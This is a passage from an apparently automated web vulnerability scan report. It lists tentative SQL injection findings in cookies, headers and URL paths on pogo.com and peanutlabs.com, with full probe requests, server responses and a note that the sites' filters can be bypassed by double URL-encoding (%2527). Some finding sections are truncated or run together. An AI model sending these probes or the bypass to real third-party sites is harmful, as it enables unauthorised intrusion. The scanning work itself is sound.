Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: mt_imp=54267db83a49b89cd0644d669488302a%27%27; path=/
Location: http://www.socialtrack.net/click.track?CID=121402&AFID=73472&ADID=297792&SUBID=CD1
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

1.18. http://www.pogo.com/ [com.pogo.ga cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.pogo.com
Path:	/

Issue detail

The com.pogo.ga cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the com.pogo.ga cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /?pageSection=homnav_logo HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga='; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response 1 (redirected)

Request 2

GET /?pageSection=homnav_logo HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=''; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response 2 (redirected)

HTTP/1.1 302 Moved Temporarily
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Location: http://www.pogo.com/login/entry.jsp?site=pogo&redr=http%3A%2F%2Fwww.pogo.com%2F%3FpageSection%3Dhomnav_logo
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Date: Sun, 09 Jan 2011 01:57:18 GMT
Server: Apache-Coyote/1.1

1.19. http://www.pogo.com/action/pogop/welcome.do [com.pogo.info cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.pogo.com
Path:	/action/pogop/welcome.do

Issue detail

The com.pogo.info cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the com.pogo.info cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the com.pogo.info cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /action/pogop/welcome.do?intcmp=cp_10price_1110_cpcom_bottomtext HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71%2527; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response 1 (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: no-cache, no-store
Content-Language: en-US
Pragma: no-cache
Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login
Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 01:55:51 GMT
Server: Apache-Coyote/1.1
Content-Length: 35534

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
reg/signin.do', {
       method : 'get',
       data : 'returnType=&returnValue=' + escape(''),
       onSuccess: function(responseText) {
           var forwardUrl = responseText;
           window.location = forwardUrl;
       },
       onFailure: function () {
           alert('Could not log you in');
           MootoolsUtils.dispose($('fb-reg-signin-backdrop'));
       }
   });
}

</script>
...[SNIP]...
Bowling,Sci-Fi Slots,SCRABBLE,SCRABBLE Cubes,Scrabble Tour,Showbiz Slots,Showbiz Slots II,Shuffle Bump,Shutter Island,Slingo,Sock Hop Slots,Solitaire Rush,Spades,Spider Solitaire,Spin Win,Squelchies,Stack 'em,Stellar Sweeper,Sudoku Classic,Sudoku Puzzle Blast,Sudoku Quest,Super Dominoes,Swashbucks,Swashbucks To Go,Sweet Tooth 2,Sweet Tooth To Go,Texas Hold'em Poker,The Poppit Show,The Price Is Right,Th
...[SNIP]...

Request 2

Response 2 (redirected)

HTTP/1.1 302 Moved Temporarily
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Location: http://www.pogo.com/action/pogop/lightregview.do
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Date: Sun, 09 Jan 2011 01:55:51 GMT
Server: Apache-Coyote/1.1

1.20. http://www.pogo.com/home/home.jsp [com.pogo.info cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.pogo.com
Path:	/home/home.jsp

Issue detail

Remediation detail

Request 1

GET /home/home.jsp?sls=2&site=pogo HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71%2527; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response 1 (redirected)

Request 2

Response 2

HTTP/1.1 301 Moved Permanently
Location: /?sls=2&site=pogo
Content-Length: 0
Date: Sun, 09 Jan 2011 01:48:49 GMT
Server: Apache-Coyote/1.1

1.21. http://www.pogo.com/home/home.jsp [com.pogo.unid cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.pogo.com
Path:	/home/home.jsp

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.pogo.com
Path:	/prize/prize.do

Issue detail

The com.pogo.hp.ls.cfg cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the com.pogo.hp.ls.cfg cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /prize/prize.do?pageSection=footer_prize HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0'; com.pogo.tafrcode=;

Response 1 (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 01:56:53 GMT
Server: Apache-Coyote/1.1
Content-Length: 25666

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
reg/signin.do', {
       method : 'get',
       data : 'returnType=&returnValue=' + escape(''),
       onSuccess: function(responseText) {
           var forwardUrl = responseText;
           window.location = forwardUrl;
       },
       onFailure: function () {
           alert('Could not log you in');
           MootoolsUtils.dispose($('fb-reg-signin-backdrop'));
       }
   });
}

</script>
...[SNIP]...

Request 2

Response 2 (redirected)

HTTP/1.1 302 Moved Temporarily
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Location: http://www.pogo.com/login/entry.jsp?site=pogo&redr=http%3A%2F%2Fwww.pogo.com%2Fprize%2Fprize.do%3FpageSection%3Dfooter_prize
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Date: Sun, 09 Jan 2011 01:56:54 GMT
Server: Apache-Coyote/1.1

1.25. http://www.pogo.com/prize/prize.do [op600clubpogoliid cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.pogo.com
Path:	/prize/prize.do

Issue detail

The op600clubpogoliid cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the op600clubpogoliid cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /prize/prize.do?pageSection=footer_prize HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e'; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response 1

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 01:56:03 GMT
Server: Apache-Coyote/1.1
Content-Length: 25548

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
reg/signin.do', {
       method : 'get',
       data : 'returnType=&returnValue=' + escape(''),
       onSuccess: function(responseText) {
           var forwardUrl = responseText;
           window.location = forwardUrl;
       },
       onFailure: function () {
           alert('Could not log you in');
           MootoolsUtils.dispose($('fb-reg-signin-backdrop'));
       }
   });
}

</script>
...[SNIP]...

Request 2

GET /prize/prize.do?pageSection=footer_prize HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e''; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response 2

HTTP/1.1 302 Moved Temporarily
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Location: http://www.pogo.com/login/entry.jsp?site=pogo&redr=http%3A%2F%2Fwww.pogo.com%2Fprize%2Fprize.do%3FpageSection%3Dfooter_prize
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Date: Sun, 09 Jan 2011 01:56:03 GMT
Server: Apache-Coyote/1.1

1.26. http://www1.peanutlabs.com/peanut-labs-acquired-by-online-research-company-e-rewards-2/ [PHPSESSID cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www1.peanutlabs.com
Path:	/peanut-labs-acquired-by-online-research-company-e-rewards-2/

Issue detail

The PHPSESSID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the PHPSESSID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the PHPSESSID cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /peanut-labs-acquired-by-online-research-company-e-rewards-2/ HTTP/1.1
Host: www1.peanutlabs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; pl_email=test4%40fastdial.net; __utmz=28928570.1294536852.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=3jamnj3v5les4euhv3rnmsdb04%2527; __utma=28928570.961439791.1294536852.1294536852.1294536852.1; __utmc=28928570; pl_lang=en_US; __utmb=28928570.3.10.1294536852;

Response 1

HTTP/1.1 500 Internal Server Error
Date: Sun, 09 Jan 2011 07:24:43 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 09 Jan 2011 07:24:43 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 369
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta http-equiv="Conte
...[SNIP]...

Request 2

GET /peanut-labs-acquired-by-online-research-company-e-rewards-2/ HTTP/1.1
Host: www1.peanutlabs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; pl_email=test4%40fastdial.net; __utmz=28928570.1294536852.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=3jamnj3v5les4euhv3rnmsdb04%2527%2527; __utma=28928570.961439791.1294536852.1294536852.1294536852.1; __utmc=28928570; pl_lang=en_US; __utmb=28928570.3.10.1294536852;

Response 2

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 07:24:43 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://www1.peanutlabs.com/xmlrpc.php
Link: <http://www1.peanutlabs.com/?p=568>; rel=shortlink
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29570

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Peanut Labs | Peanut Labs Acquired By E-Rewards
...[SNIP]...

1.27. http://www1.peanutlabs.com/wp-content/plugins/contact-form-7/scripts.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www1.peanutlabs.com
Path:	/wp-content/plugins/contact-form-7/scripts.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /wp-content/plugins/contact-form-7%2527/scripts.js HTTP/1.1
Host: www1.peanutlabs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; pl_email=test4%40fastdial.net; __utmz=28928570.1294536852.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; __utma=28928570.961439791.1294536852.1294536852.1294536852.1; __utmc=28928570; pl_lang=en_US; __utmb=28928570.3.10.1294536852;

Response 1

HTTP/1.1 500 Internal Server Error
Date: Sun, 09 Jan 2011 07:24:33 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 09 Jan 2011 07:24:33 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 369
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta http-equiv="Conte
...[SNIP]...

Request 2

GET /wp-content/plugins/contact-form-7%2527%2527/scripts.js HTTP/1.1
Host: www1.peanutlabs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; pl_email=test4%40fastdial.net; __utmz=28928570.1294536852.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; __utma=28928570.961439791.1294536852.1294536852.1294536852.1; __utmc=28928570; pl_lang=en_US; __utmb=28928570.3.10.1294536852;

Response 2

HTTP/1.1 404 Not Found
Date: Sun, 09 Jan 2011 07:24:33 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://www1.peanutlabs.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 09 Jan 2011 07:24:34 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40811

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Peanut Labs | Page not found</title>

<!-- ST
...[SNIP]...

1.28. http://www1.peanutlabs.com/xmlrpc.php [User-Agent HTTP header] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www1.peanutlabs.com
Path:	/xmlrpc.php

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /xmlrpc.php HTTP/1.1
Host: www1.peanutlabs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527
Connection: close
Cookie: pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; pl_email=test4%40fastdial.net; __utmz=28928570.1294536852.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; __utma=28928570.961439791.1294536852.1294536852.1294536852.1; __utmc=28928570; pl_lang=en_US; __utmb=28928570.3.10.1294536852;

Response 1

HTTP/1.1 500 Internal Server Error
Date: Sun, 09 Jan 2011 07:24:40 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 09 Jan 2011 07:24:40 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 369
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta http-equiv="Conte
...[SNIP]...

Request 2

GET /xmlrpc.php HTTP/1.1
Host: www1.peanutlabs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527
Connection: close
Cookie: pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; pl_email=test4%40fastdial.net; __utmz=28928570.1294536852.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; __utma=28928570.961439791.1294536852.1294536852.1294536852.1; __utmc=28928570; pl_lang=en_US; __utmb=28928570.3.10.1294536852;

Response 2

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 07:24:40 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Vary: Accept-Encoding
Content-Length: 42
Connection: close
Content-Type: text/plain

XML-RPC server accepts POST requests only.

2. HTTP header injection previous next
There are 29 instances of this issue:

http://ad.doubleclick.net/ad/N6271.148484.FRONTLINEDIRECTINC./B4796131.29 [REST URL parameter 1]
http://ad.doubleclick.net/ad/downloads.pogo/category [REST URL parameter 1]
http://ad.doubleclick.net/ad/home.pogo/spotlight [REST URL parameter 1]
http://ad.doubleclick.net/ad/scrabble.pogo/load [REST URL parameter 1]
http://ad.doubleclick.net/ad/scrabble.pogo/room [REST URL parameter 1]
http://ad.doubleclick.net/adi/N5621.148484.0233710364621/B4682144 [REST URL parameter 1]
http://ad.doubleclick.net/adj/N6457.4298.ADVERTISING.COM/B4840137.13 [REST URL parameter 1]
http://ad.doubleclick.net/adj/downloads.pogo/category [REST URL parameter 1]
http://ad.doubleclick.net/adj/home.pogo/spotlight [REST URL parameter 1]
